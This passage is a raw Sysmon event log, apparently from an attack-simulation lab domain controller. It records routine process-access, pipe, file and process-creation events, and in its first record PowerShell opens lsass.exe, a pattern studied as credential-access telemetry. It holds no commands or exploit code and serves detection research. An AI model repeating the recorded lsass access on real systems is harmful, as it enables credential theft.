12:01:04.658{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.414{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.412{266CAFBE-647D-6064-3000-00000000AE01}2648win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 17141700x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:04.487{266CAFBE-647F-6064-5000-00000000AE01}3024\PSHost.132616656634124279.3024.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.487{266CAFBE-647F-6064-5000-00000000AE01}3024NT 
AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_cgruhrrd.izv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.487{266CAFBE-647F-6064-5000-00000000AE01}3024NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_tjjeaadm.5ar.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-6480-6064-5400-00000000AE01}23322560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.414{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program 